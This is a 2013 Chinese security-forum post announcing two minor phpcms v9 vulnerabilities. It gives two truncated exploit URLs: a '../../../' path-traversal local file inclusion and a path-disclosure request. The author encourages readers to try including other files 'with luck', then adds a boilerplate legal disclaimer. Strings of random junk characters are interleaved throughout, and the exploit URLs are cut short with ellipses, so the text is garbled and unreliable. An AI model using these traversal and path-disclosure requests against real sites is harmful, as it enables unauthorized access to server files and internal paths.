找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2253|回复: 0
打印 上一主题 下一主题

phpcms v9两个鸡肋漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
- p1 _; R: B" ~; d8 K1 f  b& T, k. R* ]6 _2 y: `! D- g
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
& w! [8 z$ a+ U1 \% u4 F. a! O6 J5 t3 w9 V6 O
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。5 o; l' w# {! e# h
; D5 H) [0 K) C& j4 ?) ?+ E
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
/ r% K4 A6 Y# S  V4 C& l& O2 b7 {. I, i$ l$ F9 C9 u9 k2 M7 z! z  }
#暴路径; I. S) y- q. S
5 X! b4 z5 C" L! ]3 }8 P6 S
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
. g* l) U/ L1 e
$ k: a. L( A: }' Y  S$ e
8 m: ^+ {" z! k# V
. q3 V- c7 D, A3 z- L1 a9 Y. N+1
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表